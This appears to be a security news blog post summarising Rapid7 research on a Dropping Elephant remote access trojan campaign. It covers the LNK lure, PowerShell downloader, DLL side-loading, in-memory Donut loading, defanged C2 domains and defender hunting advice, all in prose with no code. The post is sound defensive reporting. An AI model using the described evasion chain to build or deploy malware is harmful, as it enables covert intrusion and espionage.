Posted in

Dropping Elephant Resurfaces With Advanced In-Memory RAT Campaign

by Rakesh0

The threat actor known as Dropping Elephant has re-emerged with a significantly upgraded malware operation, leveraging a China-themed lure document and a sophisticated remote access trojan (RAT) designed to evade modern security controls.

Researchers at Rapid7 uncovered the latest Dropping Elephant RAT campaign during a proactive threat-hunting engagement and found that while the group’s core tradecraft remains recognizable, the underlying malware framework has undergone substantial refinement.

The campaign combines malicious shortcut files, PowerShell-based delivery, DLL side-loading, in-memory payload execution, and advanced anti-analysis techniques to provide attackers with persistent access while minimizing forensic visibility.

Key Details

The attack begins with a malicious Windows shortcut file named GRES3001.lnk, disguised as a PDF document associated with an industrial energy contract.

When opened, the shortcut silently executes an embedded PowerShell downloader while presenting the victim with a legitimate-looking decoy document related to a GRES-3 seawater pump contract.

Behind the scenes, the PowerShell script contacts a staging server hosted at chinagreenenergy[.]org, where additional malware components are retrieved.

Rapid7 researchers were able to obtain the entire malware toolkit because the staging infrastructure remained active during their investigation.

Their analysis identified multiple indicators linking the operation directly to previous Dropping Elephant campaigns, including:

  • Similar delivery mechanisms
  • Consistent screenshot collection behavior
  • Familiar command-and-control communication patterns
  • Reused command-handler architecture
  • Comparable beaconing logic

The findings suggest the group has evolved its malware capabilities without abandoning its established operational methodology.

Technical Analysis

One of the most notable aspects of the campaign is its sophisticated multi-stage execution chain.

After the initial PowerShell downloader runs, several files are staged within the C:\Users\Public directory.

Among them is a legitimate Microsoft executable named Fondue.exe, which is abused to perform DLL side-loading.

The attack chain unfolds as follows:

Stage 1: DLL Side-Loading

Fondue.exe loads a malicious DLL disguised as APPWIZ.cpl.

Because the executable is signed and trusted, this technique helps the attackers bypass certain security controls and blend into normal system activity.

Stage 2: Payload Decryption

The malicious DLL decrypts an encrypted file named editor.dat and passes the resulting payload to a Donut shellcode loader.

Stage 3: In-Memory Execution

The Donut loader maps the final RAT directly into memory.

Unlike conventional malware that writes executable files to disk, this approach leaves a significantly smaller forensic footprint and reduces the likelihood of detection by traditional antivirus solutions.

Once active, the malware performs extensive host reconnaissance before establishing encrypted communications with its command-and-control (C2) infrastructure hosted at gcl-power[.]org over HTTPS on port 443.

The RAT beacons to its operators every 10 seconds and supports:

  • Remote command execution
  • File uploads
  • File downloads
  • Directory enumeration
  • Screenshot capture
  • Host reconnaissance

Together, these capabilities provide attackers with complete operational control over infected systems.

Impact and Risks

The campaign presents significant risks for organizations across both public and private sectors.

Because the RAT operates entirely in memory and employs multiple layers of evasion, infected systems may remain compromised for extended periods without triggering traditional endpoint alerts.

Potential impacts include:

  • Long-term unauthorized access
  • Sensitive data theft
  • Credential harvesting
  • Internal reconnaissance
  • Lateral movement
  • Deployment of additional malware
  • Espionage operations
  • Follow-on ransomware activity

The malware’s ability to collect screenshots and execute arbitrary commands provides operators with real-time visibility into victim environments, increasing the risk of targeted data exfiltration and operational disruption.

Organizations that rely heavily on signature-based detection methods may struggle to identify infections before substantial damage occurs.

Expert Recommendations

Rapid7 advises defenders to focus on behavioral detection rather than relying solely on indicators of compromise (IOCs).

Because filenames, hashes, and infrastructure can change rapidly between campaigns, defenders should prioritize identifying suspicious activity patterns.

Monitor Shortcut-to-PowerShell Execution

Investigate instances where:

  • LNK files spawn PowerShell
  • PowerShell downloads content from external domains
  • Hidden PowerShell execution occurs

Hunt for Public Directory Staging

Monitor for suspicious files being written to:

C:\Users\Public\

Particularly when executable content, DLLs, or encrypted payloads appear unexpectedly.

Detect Suspicious Scheduled Tasks

A key detection opportunity involves the scheduled task:

GoogleErrorReport

Security teams should immediately investigate systems where this task launches executables from non-standard Windows directories.

Strengthen Endpoint Detection

Organizations should ensure their endpoint detection and response (EDR) platforms can identify:

  • Memory-resident malware
  • DLL side-loading activity
  • AMSI bypass attempts
  • ETW tampering
  • PowerShell abuse
  • Process injection techniques

Review Logging and Telemetry

Enable detailed logging for:

  • PowerShell execution
  • Scheduled task creation
  • Process creation events
  • DLL loading activity
  • Outbound HTTPS connections

Implement Network Monitoring

Monitor for beaconing patterns and unusual outbound communications to newly registered or suspicious infrastructure.

Industry Context

The campaign reflects a broader trend toward stealth-focused malware frameworks that prioritize memory-only execution and defense evasion.

Threat actors increasingly rely on techniques such as:

  • In-memory payload delivery
  • DLL side-loading
  • Living-off-the-land binaries (LOLBins)
  • AMSI bypasses
  • ETW suppression
  • Encrypted command-and-control traffic

These methods are designed to undermine traditional security tooling and complicate both automated detection and manual incident response.

The use of Donut shellcode loaders, runtime API resolution, and control-flow flattening further demonstrates how modern threat actors are investing in anti-analysis capabilities traditionally associated with advanced persistent threat (APT) operations.

As endpoint protection technologies improve, attackers continue shifting toward behavioral evasion rather than relying solely on malware obfuscation.

Conclusion

Rapid7’s discovery of the latest Dropping Elephant operation highlights how established threat actors continue evolving their toolsets to stay ahead of defenders. By combining malicious shortcut files, PowerShell delivery, DLL side-loading, in-memory RAT execution, and extensive anti-analysis protections, the group has built a malware framework capable of maintaining persistent and stealthy access to victim environments.

For defenders, the campaign serves as a reminder that behavioral monitoring, threat hunting, and memory-focused detection capabilities are increasingly essential as attackers move beyond traditional file-based malware techniques.

FAQ SECTION

Who is Dropping Elephant?

Dropping Elephant is a long-tracked cyber threat actor known for conducting targeted malware campaigns that often use social engineering lures, remote access trojans, and stealth-focused persistence techniques.

What is the primary malware used in this campaign?

The campaign deploys a custom remote access trojan (RAT) that executes entirely in memory and provides attackers with full remote control of compromised systems.

Why is in-memory malware dangerous?

In-memory malware avoids writing its final payload to disk, making it more difficult for traditional antivirus and file-scanning tools to detect.

What is the GoogleErrorReport scheduled task?

GoogleErrorReport is a malicious persistence mechanism created by the malware. It launches the compromised execution chain every minute to maintain access after system reboots or interruptions.

How can organizations detect this campaign?

Defenders should monitor for PowerShell launched by shortcut files, suspicious scheduled tasks, DLL side-loading behavior, AMSI tampering, ETW patching, and files staged in the C:\Users\Public directory.

Subscribe

Leave a Reply

Your email address will not be published. Required fields are marked *